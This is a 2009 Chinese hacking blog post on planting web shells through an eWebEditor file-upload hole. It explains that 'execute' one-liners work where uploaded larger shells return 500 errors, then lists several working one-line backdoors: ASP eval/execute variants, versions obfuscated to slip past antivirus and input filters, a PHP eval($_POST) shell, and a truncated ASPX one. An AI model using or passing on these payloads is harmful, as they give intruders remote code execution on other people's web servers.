应对eWebEditor漏洞上传文件500错误的方法
作者:随然 日期:2009-11-28
相信大家对eWebEditor并不陌生
大家在搞站的可否发现有的uploadfiles目录里面传上去的大马或小马是500错误
入侵了这么久,发现在此情况下,上传一句话,可以连接!
eval的一句话有时候会失败
execute的一句话基本上都是成功的!
By:van
附:(多种写一句话的方法)
ASP一句话
1.<%eval request("YouPass")%>
2. <%executerequest("YouPass")%>
3. <%execute(request("YouPass"))%>
免杀大部分网站的一句话
4.<% set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms.Language="VBScript" ms.AddObject "Response", Response ms.AddObject "request", request ms.ExecuteStatement("ev"&"al(request(""YouPass""))") %>
免杀部分网站过略<%,%>的一句话
5.<script language=VBScript runat=server>execute request("YouPass")</script%gt;
免杀部分网站过略双引号的一句话
6.<%eval request(YouPass(35))%>
php一句话
7.<?php eval($_POST[YouPass]);?>
aspx一句话
8.<script language="C#" runat="server"> WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("
[本日志由 随然 于 2009-11-28 11:54 PM 编辑]
上一篇: eWebEditor文件上传漏洞的修补方法下一篇: eWebEditor文件上传漏洞的利用
文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags: ASP 黑客
相关日志:
评论: 0 | 引用: 0 | 查看次数: 9702
发表评论